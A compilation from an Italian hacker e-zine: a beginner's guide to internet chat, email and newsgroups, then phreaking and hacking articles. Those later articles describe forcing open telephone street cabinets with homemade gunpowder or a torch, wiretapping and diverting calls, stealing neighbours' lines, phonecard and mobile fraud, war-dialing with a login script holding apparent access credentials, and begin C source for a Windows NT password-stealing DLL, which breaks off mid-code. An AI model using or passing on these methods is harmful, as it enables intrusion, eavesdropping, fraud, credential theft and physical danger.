la comunicazione in tempo reale e non. La comunicazione in tempo reale Esistono molti strumenti che permettono questo tipo di comunicazione. Possiamo distinguere in due diversi gruppi a seconda del protocollo su cui basato il loro funzionamento ovvero: 1. IRC 2. Chat su base Talk L' IRC (Internet Relay Chat) Si basa sul protocollo omonimo, per avviare una sessione irc necessario: 1. Un programma client IRC 2. Contattare un server IRC 3. Scegliere un canale di discussione Generalmente l'interfaccia di un client IRC mostra sulla destra i logname degli utenti collegati mentre in basso si ha la casella in cui digitare il messaggio, se selezionate un utente, si aprir un'ulteriore finestra, identica a quella appena descritta ma, il messaggio che invierete sar rivolto esclusivamente a quella persona. Se invece scrivete un messaggio nella finestra principale, questo verr replicato dal server a tutti gli utenti presenti sul canale. Tramite le Chat IRC c' anche la possibilit di spedire file, usare macro. La configurazione el 'utilizzo del client IRC di norma non comporta nessun problema particolare, in quanto tutte le funzioni sono accessibili tramite men a tendina. Infine rimane da dire che nei canali IRC presente un moderatore, che si occupa di controllare il comportamento degli utenti e che la discussione rimanga in tema escludendo eventuali indesiderati. Le Chat su base Talk Il talk e un protocollo originariamente ideato per permettere a due persone di comunicare in tempo reale tra di loro, negli ultimi tempi per ha trovato applicazione in diversi client che permettono la discussione tra pi persone contemporaneamente, mantenendo per le sue caratteristiche principali. Per poter dialogare con un qualsiasi client che basa il suo funzionamento sul protocollo talk, necessario seguire la procedura sotto riportata: 1. Richiedere all'utente con cui si desidera parlare di stabilire il collegamento tramite un indirizzo 2. Se l'utente desiderato ha in esecuzione lo stesso client per Chat talk (condizione necessaria), gli verr richiesto se vuole accettare o meno la proposta di collegamento 3. Se l'utente desiderato accetta viene stabilita la connessione, altrimenti compare un messaggio del tipo: l'utente X non vuole rispondere L'interfaccia di un client talk, totalmente diversa da quella di un client IRC ed inoltre e variabile a seconda del programma usato. In genere comunque, tutti i programmi basati su talk, permettono il trasferimento di file, la conversazione vocale, l'utilizzo di macro, di una lavagna condivisa e ovviamente la classica conversazione testuale. Inoltre questi programmi, similmente agli IRC, visualizzano su richiesta dell'utente la lista delle persone collegate e prevedono anche la possibilit di effettuare ricerche praticamente con qualsiasi chiave. Si noti che i programmi che supportano il video, funzionano sulla base di questo protocollo, ovviamente, necessaria una telecamera come ad esempio la famosa Quik Cam (nata per Mac). I software pi conosciuti per le comunicazioni in tempo reale sono: mIRC PowWow ICQ Net Meeting I-Phone (supporto video) CUSEEME (supporto video) La comunicazione non in tempo reale I canali di comunicazione non in tempo reale sono quattro, e precisamente: 1. E-Mail 2. WWW Chat 3. Mailing list 4. Newsgroup (UseNet) E-Mail noto che l'e-mail (electronic mail) molto pi veloce rispetto alla tradizionale snail-mail (posta lumaca), perch inpiega pochi secondi per arrivare a destinazione ma, nonostante ci, concettualmente considerata un mezzo di comunicazione non in tempo reale infatti, sebbene abbiamo una vaga idea del tempo che intercorre tra l'invio e l'arrivo di una mail, non possiamo sapere quando il destinatario la legger. Grazie ad un qualsiasi Browser, gli utenti di Internet sono in grado di gestire tutte le possibilit che il protocollo SMTP offre. Tra queste sono di particolare importanza le seguenti: Attachments specifica una lista di file acclusi al messaggio Cc (Carbon Copy) specifica una serie di indirizzi e-mail ai quali deve essere mandata una copia del messaggio La possibilit di specificare il livello di priorit del messaggio La possibilit di filtrare i messaggi WWW Chat Basate sul protocollo Http, le WWW Chat si suddividono in: 1. Web Chat 2. Java Chat Web Chat Un Web Chat un sistema che permette il dialogo tra due o pi utenti tramite una pagina WWW, l'utente in questo tipo di chat, (una volta constatata la presenza di altre persone per mezzo dell'apposita lista), non deve far altro che scrivere il messaggio e premere l'apposito tasto che provoca il ricaricamento della pagina in rete con la frase appena digitata, questa operazione a lungo termine estenuante, per quanto semplice non ne vale proprio la pena. Java Chat Java un linguaggio di programmazione sviluppato dalla Sun, ed orientato alla rete, il suo pregio principale quello di poter essere eseguito su qualsiasi piattaforma. Le Java Chat hanno un'interfaccia simile a quella dei client IRC, per poter sfruttare questo tipo di chat necessario avere un browser in grado di eseguire gli applet java (programmi inseriti in pagine WWW). Questo tipo di Chat pi veloce della precedente. Le mailing list Una mailing list basata sul protocollo SMTP, in pratica una lista di indirizzi e-mail appartenenti a persone che hanno un interesse comune, e vogliono scambiarsi mail sull'argomento. Per partecipare ad una mailing list necessario spedire una mail ad uno specifico indirizzo. Chiunque voglia dire o chiedere qualcosa sull'argomento non deve far altro che inoltrare una mail all'indirizzo convenzionale, il listserver provveder a spedire il messaggio a tutti gli indirizzi degli appartenenti alla lista. Esistono mailing list praticamente su tutti gli argomenti, dai Simpson all'Euro, in alcune liste presente un moderatore quindi, cercate di rispettare la netiquette per evitare spiacevoli inconvenienti. Prima di aderire ad una mailing list considerate il fatto che potreste trovare centinaia di lettere nella vostra casella di posta e quindi, correte il rischio di "forare" i Mb a vostra disposizione. L'iscrizione revocabile in qualsiasi momento. I newsgroup (UseNet) Basati sul protocollo News, i gruppi di discussione sono simili ad una mailing list ma, presentano tre fondamentali differenze e cio: 1. Non hanno l'obbligo di iscrizione (iscriversi serve solo per fare in modo che il programma visualizzi solo i newsgroup ai quali si interessati) 2. Non necessaria una casella di posta in quanto ci sono appositi server che conservano i messaggi (a tempo determinato) 3. Ai newsgroup si accede tramite browser (si scaricano i messaggi dal server) I newsgroup devono essere letti con apposito client (in genere ogni browser ne contiene uno), uno tra i pi conosciuti Free Agent. Anche i newsgroup possono essere moderati e non, nel primo caso i messaggi vengono inoltrati via e-mail ad un moderatore che decide se approvarli o meno, comunque sia evitate gli off-topic (messaggi fuori argomento). I newsgroup si dividono in binari e non, nella prima ipotesi potete inviare insieme oltre che il vostro messaggio anche file allegati, nel secondo caso invece non potete farlo, ovviamente in quest'ultima ipotesi la velocit delle varie operazioni maggiore. Ci sono diverse categorie di newsgroup quali ad esempio: comp (informatica e argomenti connessi) news (reti e software relativo alle news) rec (Hoby tempo libero e arti) sci (ricerche ed applicazioni scientifiche) soc (aspetti sociali, rilevanti politicamente o sociologicamente in generale) talk (Dibattiti su tutti gli argomenti) misc (tutto ci che non rientra nelle altre) altri... L'insieme dei newsgroup detto Usenet per distinguerlo da Internet, in effetti questa distinzione non del tutto fuori luogo infatti, i messaggi dei nowsgroup vengono trasmessi anche su altre reti di calcolatori diverse da internet. Altri servizi "interessanti"... Nel descrivere questi servizi far riferimento ad un famoso software per Win95/98 ovvero CyberKit quindi se volete provare non dovete fare altro che procurarvelo. Descrizione dei servizi resi disponibili da CyberKit: Ping Verifica la raggiungibilit di un sito e l'efficienza del collegamento che si pu stabilire con esso. TraceRoute Individua il percorso compiuto dai pacchetti di dati per giungere dal computer dell'utente ad un computer remoto. Finger Fornisce varie informazioni relative all'utente fingerato (l'utente deve essere collegato), se l'utente non viene specificato viene presentata una lista di tutti gli utenti attualmente collegati all'host. WhoIs Programma che ricerca informazioni su un determinato utente, o sottodominio della rete, interrogando un determinato database. Name Server Lookup (NS LookUp) Programma che effettua ricerche all'interno del database del DNS, con questo tipo di programma si possono ritrovare gli IP numerici corrispondenti ad un nome letterale, e viceversa. Quote Of The Day (QoD) Tradotto letteralmente sta per, citazione del giorno, nulla di essenziale ma, pu essere divertente. provate ad utilizzare questi servizi e comincerete a rendervi conto di quanto siano potenti e a quali risvolti possono portare :). Per concludere, tengo a precisare che, CyberKit solo uno dei tanti software dedicati che si possono trovare, Ping, Finger e TraceRoute, possono essere lanciati anche da prompt inoltre si tenga presente che i servizi "interessanti" non sono solo quelli sopra citati. Siamo cos giunti FINALMENTE alla fine di questa mini guida, cosa?, vi siete rotti a leggerla? bhe pensate a quanto mi sono SKAZZATO a scriverla, con la promessa che non scriver mai pi una guida per novizi vi saluto... Un ringraziamento a tutto il Newbie Staff in particolare N0bodY88 per avermi coinvolto... [DarkSide] PS=Ringrazio moltissimo x questa guida che fa' comprendere a CHIUNQUE le basi per poter ' capire come e' fatto internet , spero vivamente che tu voglia scrivere altri articoli come questo x noi e spero che altri articoli belli come questo seguiranno [ ho visto molte crew unirsi e poi distruggersi per i motivi piu' futili ... ma questo non e' proprio il nostro caso ] ... Grazie di tutto cuore ZeroCool ͻ Ŀ LE NOVITA' PER QUANTO RIGUARDA MAMMA TELECOM E ALTRE ... ٺ ͼ I&T Dream Project Ovvero un progetto da sogno Una compagnia italiana senza legami con telecom o altri che parte con un capitale sociale di 10 miliardi [ ovviamente al livello azionario ] facente capo all' editore Virgilio Degiovanni , con forte struttura centrale a Milano , dove gia' opera il suo staff di 200 persone in oltre 2000 metri quadrati di sede centrale , a cui si aggiungono i 300 addetti al call-center, per l' assistenza alla rete Advisor e ai clienti . La forza del progetto sta indubbiamente nei servizi di telecomunicazione e nel sistema di distribuzione dei profitti . Ok Approfondiamo l' argomento con un po' di dati un poco sgamo: i punti dell'I&T: distribuire tutti i servizi guadagnare su 8 livelli della propria squadra attivando solo 20 contratti Infostrada e 2 Modile Office guadagnare l' extra profitto formare la prima linea della propria squadra guadagnando sui contratti da questa procurata ed ora le cose bellissime: Ogni Advisor puo' richiedere : Internet ad training Service [ lire 300000 + iva che e' un sito a nome del richiedente di spazio 400mb ] Il piano di attacco di questa societa' e' basato quindi sulla creazione di una rete indipendente da mamma Telecazz offrendo servizi basati quindi per la telefonia fissa da Infostrada e per la mobile da carte prepagate NAT GrAnDi[nd Zc] i presupposti su cui si basano sono: 1 Ogni utente ha il desiderio di risparmiare 2 Siamo in grado di fornire servizi di alta qualita' per Internet realizzati da Infostrada e NAT 3 Con una vasta rete di distributori extra motivativati da un sistema di guadagno esclusivo si pensa di conquistare una fetta del mercato italiano nel giro di 6 mesi equivalente al 29% . Quota raggiunta attualmente per il 20% ottimo...... Presto tutte le info e i numeri per diventare ADVISOR ok....... Ps accludo immagini relative all' espansione di questa societa' nel file immagini.zip By ZeroCool [ oh finalmente lo ho finito sto cazz di articolo ]... !!!!!!!!!!!!!!!!!!!!!!!!!!\TELEKOM E CENTRALINE/!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!! QuEsTo aRtIcOlO StAtO ScRiTtO Da CyRuS ThE ViRuS e Dr.ShAdE!!!!!! !!!! deLla IHC, CheM-Boy DOVE TI TROVAVI IN QUESTO MOMENTO!! !!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!\TELEKOM E CENTRALINE/!!!!!!!!!!!!!!!!!!!!!!! DISCLAIMER: Queste informazioni sono da intendersi solo a scopo informativo e didattico, non siamo quindi responsabili delle conseguenze che potrebbero verificarsi in seguito all' errato utilizzo di tale articolo. PREMESSA: In questo articolo non verr citata la localita in cui noi della IHC abbiamo operato, si ricorda che fare tutto ci alla vista di occhi indiscreti, una cazzata. Quindi okki in mano mentre provate a fare queste cose! L' articolo e stato steso da Dr.ShAdE e Cyrus The Virus membri della IHC (ItALiAn HaCkEr CrEw). Special FRIEND "ChEm-BoY" ######### # # # ## ## # ###### # ###### ###### ###### # # # # # # # # # # # # # # # ### # ### # # # # # # # # # # # # # # # ###### ##### ###### ###### ###### # # Bene adesso che mi sono divertito male a fare i disegnini passiamo alla sresura del nostro articolo... <---TELEKOM E CENTRALINE---> Autori: CyRuS ThE ViRuS e DoCtOr ShAdE (IHC) Consumo: 13 ESTA THE GUSTO LIMONE 2 PEZZI DI PIZZA 3 PACHETTI DI GOMME.... {MARCA SCONOSCIUTA} Musica ascoltata: Musica PROGRESSIV MOLTO TRUZZA Con FRANCHINO, Dupl, GABRI FASANO, LEO DE GAS, ZICHY IL GIULLARE. RICHY LE. ROY (RIMANI SEMPRE UN MITO) P.S Questo articolo viene scritto dopo circa tre giorni dagli esperimenti sulle centraline, naturalmente, per, durante l' hackeraggio, il consumo alimentare stato maggiore :-) Bene. Prima di tutto, vogliamo precisare che , non tutte le citt hanno le stesse centraline, o meglio, non tutti i comuni hanno un tipo solo di centraline , come quelle su cui abbiamo lavorato noi. Comunque vedrete meglio sulle foto che abbiamo scattato. Il materiale che abbiamo usato era coposta da Un computer portatile , modem PCMCIA , una torcia elettrica {per hacking notturni} un tester per il voltaggio, un cavo elettrico e un cavo telefonico di circa 3/4 metri, che ci servito per fare i fili di connessione. E poi la valigetta del bravo PHREAKER con saldatore e altre stronzate. Tutto il lavoro svolto, stato suddiviso in due giorni: 1) PRIMO GIORNO Bhe, all' inizio non credevamo che l' esperimento andasse avanti anche un secondo giorno, ma gli eventi accaduti ci fecero cambiare idea. Nel nostro pimo giorno, la mattina, abbiamo fatto un giro, per osservare tutti i tipi di centraline telekom possibili. Abbiamo osservto le centraline ai bordi delle strade, quelle vicino ai palazzi, quelle che si collegano alle case e quelle che controllano il traffico di piu di 300 telefoni. Mentre giravamo sui potenti mezzi messi a disposizione dall' IHC, ci accorgemmo di una centralina veramente ecceccionale: alta circa un metro e mezzo, larga mezzo e veramente imponente. Con la plachetta con su scritto *TELECOM ITALIA*. Ora... non si sa se vi siete ma fermati a lungo a guardare una centralina telekom... Quelle che abbiamo esaminato noi erano di due tipi... o meglio tre, ma il terzo sara poi descritto a lungo nel secondo giorno. Il primo tipo quello che si trova ai lati delle case,abbastanza piccole, che controllano non + di 13 linee... Il secondo quello che si trova vicino alle cabine telefoniche e, naturalmente, regge solo quelle.. Il terzo tipo, quello che abbiamo hackato noi, quello che si trova di solito nel centro delle piazze principali delle citt... Si distingue dalle altre per la sua grandezza e per le pareti esterne in metallo e non in plastica... Per cominciare vi diciamo subito che la serratura non molto semplice da aprire... Ci sono due metodi: Primo) Bisogna avere la chiave passpartou telekom che un volta girata fa aprire un sistema a combinazione che, combinato con una manopola del tipo a ghiera, fa aprire il meccanismo. (domanda... ma se avete la chiave (cosa impossibile ai comuni mortali), che cazzo andate a cercare di forzare una centralina, visto che siete impiegati telecom....!?!?! Secondo) O con la polvere da sparo, come abbiamo fatto noi, o con una fiamma ossidrica (reperibile dalla propria mesticheria di fiducia). <--POLVERE DA SPARO--> Carbone/zolfo/salnitro. Una volta preparato l' impasto,si avvolge in un cartone , si attacca accanto alla serratura con il nsatro adesivo, ci si mette una miccia, e BOOM!!! Oppure si pu anche fare un innesto utilizzando la batteria 12 Volts del motorino... Non importa che faccia il botto, basta la fiammata, in quanto si scioglie la palstica, formando un buco. Fatto questo,si inserisce un caccaivite e si forza con cura: SI APRE!!!! <--FIAMMA--> Pi semplice e pi veloce: vi procurate una fiamma ossidrica in mesticheria dal costo che varia dalle trenta alle quaranta carte e fate il vostro buchetto da dove inserire il cacciavite. Una volta aperta , appare una visione quasi idilliaca di mille intrecci di fili di mamma Telkom: una belezza! Ripresi dalla emozione, si procede con gli esperimenti. Ci raccomandiamo: non bisogna agire impulsivamente sulla prima centralina che ci si para davanti,noi per esempio, abbiamo esegiuto il tutto in 3 , 4 giorni di sopraluoghi costanti. La domanda che ci si pone ora, questa: "che cosa si pu fare con tale bellezza?" Bhe vi assicuriamo che ci si pu fare di tutto... noi abbiamo fatto solo alcuni esperimeti dei tanti realizzabili. A noi ci interssava principalmente verificare la possibilit di fare deviazioni di chiamta, connessioni anche di rimbalzo, e prove con i cordless. 1) Intercettazione telefonica e deviazione della chiamata. Per cominciare vi diciamo che non difficle, ma bisogna agire con la massima cura e delicatezza. Infatti, dentro una centralina, ci passa la corrente, quindi, tagliare il cavo sbagliato, potrebbe costarvi, non diciamo le penne, ma come minimo una bella scottatura... Per tale esperimento vi serve un normalissimo telefono di casa. Noi ne abbiamo acquistato uno al Supermercato. Poi, una volta tagliata la parte terminate {la presa}, la si deve sostuire con dei morsetti a coccodrillo {piccoli}... Adesso abbiamo uno strumento molto interssante: un semplice telefono, che risolve molti problemi. Per prima cosa vogliamo dire che bisogna stare calmi, non si devono mettere la mani, a caso.... ma si deve prima fare un paio di prove con il tester elettronico... Si controlla tensione e amperaggio... --Vedendo una delle nostre foto allegate, vi farete una chiara impressione di ci di cui stiamo parlando...--- Ora collocando i morsetti sulla parte terminate del filo telkom (o sulla saldatura stessa) si entra , in mezzo alla linea, ci vuol dire che possibile ascolatare e intervenire nella telfonata, oppure si puo chiamare un nostro parente sperduto in Ruanda-Burundi... ...Tanto non spendiamo noi!!!--- Facciamo adesso un passo avanti.... Se noi prendiamo un pezzo di cavo telefonico {con morsetti} lo possimao usare per fare ponte,possiamo cio, deviare una chiamata e dirigerla verso un altro telfono. P.S Non vi dico che risate a invertire TUTTE le chiamte in entrata con quelle in usciata... :-) Insomma, noi ci siamo divertiti ma, tralasciando il piacere, torniamo ai nostri esperimenti... Una cosa molto importante, il fatto che si pu ridirigere le chiamate. ---Vi consigliamo di agire: Di notte, in un giorno di festa, e magari sarebbe meglio avere il padre AVVOCATO.--- Comunque se non ci si fa prendere dal panico... non si corrono troppi rischi. Altro consiglio magari quello di svolgere un paio di prove, prima di agire, per vedere se in caso di grane , possibile scappare velocemente. Inoltre. Quando cercate di aprire la centralina, mi raccomando di non lasciare casino: meno si vede, pi possibilita avrete di ritornarci in un secondo momento. Comunque ci che abbiamo capito il primo giorno della missione questo: 1 Le centraline si possono aprire senza troppi problemi. 2 La linea telefonica presente... quindi basta attaccarci il modem.. 3 E' possibile costruire dei ponticelli. 4 Si possono deviare le chiamate. Nel secondo giorno spiegheremo una delle cose pi interessati. Una volta acquistata sicurezza sulle tecniche sopra citate e possibile fare altre cose pi complicate. 2)!!!!!!!!!!!!!!!!!!!!!SECONDO GIORNO!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Siamo adesso giunti al secondo giorno dei nostri esperimenti. Bhe questa parte e un po' piu' difficile da seguire. Anche perch noi abbiamo agito a intuito e senza mai avere nulla di certo, ma siamo andati avanti ipotizzando teorie, che poi sono risultate pienamente realizzazbili. Premessa: Il materiale del secondo giorno Computer Portatile, modem PCMCIA, il nostro solito telefono, telefono cellulare, torcia elettrica, cavi telefonici, tester, morsetti, e altri piccoli oggetti da phreaker. Per prima cosa, cio' che abbiamo fatto lo potevamo benissimo fare dalla nonstra prima centralina hackata {1 giorno, anzi magari era meglio}; ma quella cha abbiamo utilizzato, era tutta di un-altro tipo {vedere foto 2} piccola e con pochi intrecci. Una volta aperta nello stesso modo della prima, unica differenza che questa serratura era molto piu piccola, l' abbiamo attentamente osservata: collegava un unica abitazione; ma potevamo benissimo attaccarci ad una delle altre 12 linee presenti.... Noi abbiamo proceduto TESTANDO con il tester il voltaggio di una linea probabilmente quella della abitazione... non succedeva nulla: restava tutto molto costante; dopo circa 15 minuti il tester impazisce ma si riporta subito costante, probabilmente, hanno ricevuto una telefonata, oppure hanno loro telefonato. A quel punto avevamo una linea sulla quale agire... A casa avevamo prima di tutto creato un semplice cavo che ci serviva per interagire. Un normale cavo telfonico che, da una parte si attaccava al modem PcMcia, dall' altra parte ai morsetti; in mezzo al cavo avevamo collegato il nostro telefono.... Ma a cosa ci servito il telefono collegato al computer e alla centralina? Semplice, per verificare una coretta connesione, e in secondo luogo per avere sempre il telefono a portata di mano. Una volta avviato il computer abbiamo subito provato la connessione con successo!!!!! Quindi ci eravamo collegati a spese di altri, e in secondo luogo potevamo far rimbalzare la nostra connessione su di un altra casa in modo da tenere le linee telfoniche sempre libere. Ma la cosa pi divertente era quella di utilizzare direttamente una linea telekom {Linea di servizio}... Si riconosceva facilmente perche li si collegavano tutte le altre linee. Si capisce bene che i vantaggi sono molti perch quindi possibile fare un ponte di linee, tornarsene a casa e sfrttare il ponte per la connessione... magari avendo anche utilizzato la base di un cordless interrata. Ma basti pensare che , se invece esserci collegati a questo tipo di centralina ci eravamo collegati, a quella grossa del primo giorno? bhe io penso che sarebbe stato veramete molto pi seria la cosa: perch bastava far ponte sulla mia linea di casa, e collegarmi da casa, ma utilizzare la linea di una abitazione due isolati piu lontana. Ma il difficile sarebbe individuare la propria linea...{se vedete la prima foto vi rendete conto}. Un modo, potrebbe essere quello di telefonare ad una segreteria telefonica, tornare alla centralina e con il telefono cercare la telefonata che avevamo effetuato. Insomma le cose che si possono fare sono veramente tante noi ne abbiamo eseguite alcune con sucesso , poi sta anche a voi, utilizzare la fantasia , per trovare nuove tecniche. A proposito del materiale: MA il CELLULARE A COSA CI E SERVITO? Bhe nulla di ci che pensate, ma e utile per non destare sopetti nei confronti della gente che passeggia di notte e che potrebbe insospetrisi se vede dei ragazzi che alle 3 o alle 4 di notte smanettano su roba telkom. Allora noi, appena vedevamo una macchina che passava, chiudevamno il computer nella sacca, e, con il cellulare facevamo finta di parlare... Pu sembrare paranoico, ma vi assicuriamo che funziona!!! Attenti alle persone che vi guadano: non volgete mai la faccia dalla loro parte. E cercate di essere naturali il pi possibile ---Ehh Ehh facile essere naturali in queste situazioni--- Ci raccomandiamo di non fare cazzate con le info raccolte in questo articolo... Per maggiori informazioni sulle centraline telecom, potete scriverci a ithackcrew@iname.com oppure per vedere tutte le altre foto, potrete consultare il nostro sito a: http://members.tripod.com/~ithackcrew/index.html ... DR.SHADE E CYRUS THE VIRUS BY I.H.C (ITALIAN HACKER CREW) Un ringraziamento, particolare al nostro AMICO "ChEm-BoY" che non potuto venire al meeting CAusE.... \/[OpS]\/ NOTA DI N0bodY88 = a nome del NewBies Staaff ringrazio Dr.Shade, Cyrus The Virus, ChEm-BoY, e tutta l'Italian Hacker Crew. Le foto che sono state citate si trovano sul ns sito www.newbies.tsx.org nel file foto_ihc.zip tra i file downoadabili. ͻ Ŀ INTERESSANTI INFO SU TELEFONI E AFFINI ٺ ͼ ͻ ͹CABINE X NAVIGARE GRATIS͹ ͼ B da dove cominciamo...Volete sapere un modo sicuro x inculare la telekoma? Come avrete notato in campagna ci sono molte cabine di circa 1,30 m x 50 cm che raggruppano tutti le linee telefoniche della zona. Voi non dovete far altro che aprire lo sportello ed applicare ai fili che sono sulle cabine il cavetto che arriva al modem.Dovete star attenti per a togliere il filo ogni volta che vi disconnettete ed consigliabile andarci di notte (cos non vi vede nessuno). Questo sistema per pu essere attuato solo da chi abita vicino a quste cabine. KaOsS ͻ ͹CELLULARI E SCHEDE TELEFONICHE͹ ͼ Come tutti saprete la TELECOM difficile da truffare ,ma ecco qu un p di cosette che possono tornare utili.Partiamo con le cose pi semplici,inviare SMS a qualunque cellulare GSM gratuitamente e rimanendo del tutto anonimi. Ecco qui un sito che pu tornare utile: WWW.GSMBOX.COM Una seconda cosetta semplice ricaricare le schede telefoniche, basta soltanto spruzzare della lacca per capelli sulla striscia mangnetica e succesivamente passarla su un televisore vecchio,la scheda si ricaricher. Ora questa cosetta e' riservata soltanto ai possessori di un cellulare ERIKSON con contratto OMNITEL. Digitare il numero desiderato poi premere velocemente ok crl e infine of che terrete premuto fino al termine della comunicazione. Il cellulare si spengner e voi comunicherete gratuitamente senza spendere una lira. L'unico inconveniente che la OMNITEL dopo qualche settimana ve lo disattiver. Per ora finiamo cosi ma presto vi faremo conoscere altre cose su truffare la TELECOM. Realizzato da {PrOzAcK} NOTA DI N0bodY88 = queste cose spigate nell'ultimo articolo di {PrOzAcK} mi sembrava di averle gia' sentite come "leggende metropolitane" ma quando ho contattato {PrOzAcK} lui mi ha detto che a lui non sempre, ma alcune volte, funziona, e quindi se avete domande da fargli...scrivete alla e-zine e vi faremo rispondere da lui ͻ Ŀ GREEN: ma quanti cazz ce ne sono ٺ ͼ Ps voglio fare una precisazione e' verissimo che oggi tantissimi che troviamo on-line sono collegati tramite green di cui cito il piu' famoso Compuserve ma non e' detto che tutti questi siano phreacker abili molto spesso si tratta di ragazzi stanchi di pagare le cazz di bollette [ Come gia' in Butcher From Inside e' stato fatto notare ah ps colgo il momento per farvi un complimento per la rivista : continuate cosi' che andate forte ] . I green sono molto e sottolineo molto rischiosi e quindi okkio ad usarli ... Ma poi ognuno fa come cazz vuole quindi auguri .. Vi consiglio pero' delle precauzioni controllate almeno in voltaggio della linea o collegatevi raramente non fatelo da casa vostra ... Bho io i consigli li ho dati quindi posso continuare allegramente , voglio partire dalle basi x far capire a tutti questo articolo Quindi lo divido in due parti chi e' gia' preparato vada alla parte due cosi' non vi rompete i coglioni PARTE 1: I green sono numeri di telefono che iniziano con il prefisso uno 167 [ ohhhhhhh ] quindi gratuiti [ riohhhh] sono utililizzati spesso della aziende per i loro cazzi via internet , e' rischioso usarli perche' se vi beccano la galera e' assicurata .. Per farvi un esempio di green vi parlero' di quello di Telecom per fare abbonamenti [ presente il numero verde per fare abbo on-line ] in questo fino a 4 mesi fa era possibile navigare in internet grazie agli op che avevano lasciato la porta ftp aperta spettacolare ma ora con il filtraggio di pacchetti tutto cio' non e' + possibile [ se e' possibile fatemelo notare kokok@tin.it ] [ ps ho notato che il tipo di terminale e' un ascend e ' che vi sono dei cazz di comandi che puoi dare per vedere le chiamate se qualuno sa qualche cosa in + mi mandi una mail Grazzzie ] , pausa sigaretta ...... Ok come li trovo usa un bel war-dialer nel nostro sito troverai il PHONETAG che gira su Windowz e inizia a cercare .... Ok fatto cio' troverai green a ' manetta ' e divertiti soppratutto a trovare le passwd del green ps non basta avere il numero . PARTE 2 : ok ci siamo ho il mio bel green come sono felice , ho la mia passwd ma cosa manca? La procedura per collegarsi....aspe la cerco....eccola: COPIA E INCOLLA proc main transmit ".^M" waitfor "SITA" transmit "NUI 19730001^M" waitfor "password" transmit "KHS9NE^M" waitfor "active" transmit "2111855^M" waitfor "Host name:" transmit "cis^M" waitfor "ID:" transmit $USERID,raw transmit "/go:pppconnect^M" waitfor "ssword:" transmit $PASSWORD,raw transmit "^M" waitfor "One moment please" endproc Ok bella e ora collegatevi e okkio ..... ZeroCool [ ps voglio fare notare che in mirc di gente disposta a scambiare numeri e account ne trovate veramente molta ma okkio ai pacchi e se non avete delle precauzioni quando vi collegate lasciate pure perdere ] ah ri ps provate questi [ sempre a livello informativo]: 167444888 Telecom ITalia richiede un nunmero x passarvi l' interno di una zona. 167327111 chiede userid e passwd ma non so cosa faccia mandatemi una mail x favore se qualcuno sa qualcosa in + . 167721111 Tin Europe ͻ Ŀ COMPUSERVE ٺ ͼ Allora raga premetto che x scrivere questo articolo mi son documentato un po' per scriverlo...ok allora come mi faccio un fake a compuserve???????? mha... 1) o scarico cis26.exe 2) o faccio cosi' [visto che il primo occupa 11mb meglio che spiego il secondo] ok allora login 177000,5000 e password: Pc*Magnet e poi vi appare tutto cio' ok a voi : CompuServe ASCII Interface - Signup Thank you for your interest in joining CSi (CompuServe)! CSi no longer supports sign-ups through this mechanism. To sign-up to CSi and experience all we have to offer, call us at 800-848-8199 in the US and Canada between the hours of 8:00 am and 1:00 am weekdays and 10:00 am and 10:00 pm weekends Eastern time to receive a FREE start-up kit. This kit includes free CSi software that will allow you to sign-up and access CSi Press for CompuServe and the Internet. CSi software supports computers with the Windows 95/NT, Windows 3.1x and Macintosh operating systems. If you are an airline crew member, please call 1-800-447-8549. If you are signing up for a corporate account, please call 1-800-226-0928 or 614-718-2185. If you reside outside the US and Canada, contact the Customer Service office nearest you to obtain your free start-up kit with CSi software. Press for more !more ! CompuServe You can locate Customer Service offices and request software through the CompuServe Web Page at http://world.compuserve.com. No matter how you request your CSi software, it will be mailed out promptly to get you online right away. (If you cannot use the software provided by CompuServe and are connecting with a terminal emulation program, please contact Customer Service to request that they complete the sign-up process for you. In the US and Canada call 800-336-6823.) Ok poi fate il fake Province Phone No. Baud Rate Country Network Milan 39 02 22479532 14.4k 28.8k 33.6k Italy CPS Rome 39 06 51957347 14.4k 28.8k 33.6k Italy CPS Bari 39 0805316139 33.6k Italy EQT Bolzano 39 0471 981783 33.6k Italy EQT Catania 39 095532557 33.6k Italy EQT Florence 39 0555015540 14.4k 28.8k 33.6k Italy EQT Genoa 39 010588162 14.4k 28.8k 33.6k Italy EQT Naples 39 0815512011 14.4k 28.8k 33.6k Italy EQT Turin 39 011533554 14.4k 28.8k 33.6k Italy EQT Venice 39 0415340331 14.4k 28.8k 33.6k Italy EQT Verona 39 0458002387 14.4k 28.8k 33.6k Italy EQT Udine 39 0432 295260 33.6k Italy EQT Ancona 39 0712804597 33.6k Italy EQT Bergamo 39 035231786 33.6k Italy EQT Brescia 39 30 2420587 33.6k Italy EQT Olbia 39 0789 67613 33.6k Italy EQT Padua 39 0498076801 14.4k 28.8k 33.6k Italy EQT Parma 39 0521 238460 33.6k Italy EQT Ps: ho messo anche dentro i numeri italiani di compuserve che ovviamente vi servono... ZeroCool ͻ Ŀ Guida all' Hacking di Windows NT ٺ ͼ Created by: Ax1s INDICE: 1) WinNT esegue tutti i tipi di file. 2) Usare i trojan 3) I file SAM 4) Diventare root su una sola macchina 5) Conclusioni L'hacking di WinNT risulta spesso piuttosto semplice (non dimentichiamo che prodotto dalla Microsoft!) in quanto esistono centinaia di exploit che possono essere utilizzati. Scriver qui quelli pi comuni e che vanno bene quasi in qualsiasi situazione. 1. WinNT esegue tutti i tipi di file. E' un grosso bug di questo sistema operativo: mi sembra che funzioni fino a winNT4 sp3. Basta rinominare un file .exe con una qualsiasi altra estensione ed il file verra' eseguito lo stesso. Provate infatti ad inserire quel file in una riga di un file .bat. Esso verr eseguito. Grazie a questo bug stato fatto un exploit che riporto qui sotto ma che trovate dappertutto in rete: uno dei pi efficaci. Basta compilare questo programmino e rinominarlo come FPNWCLNT.DLL. Questo infatti uno dei file che winnt utilizza all'avvio. Riusciremo cos ad ottenere l'elenco delle password in un file a nostra scelta!!! Dopo averlo compilato basta piazzarlo nella dir winnt/system32 e, dopo il riavvio, troveremo le pass nel file c:\temp\newbies.txt! #include #include #include struct UNI_STRING { USHORT len; USHORT maxlen; WCHAR *buff; }; static HANDLE fh; BOOLEAN __stdcall InitializeChangeNotify () { DWORD wrote; fh = CreateFile("C:\\temp\\newbies.txt", GENERIC_WRITE, 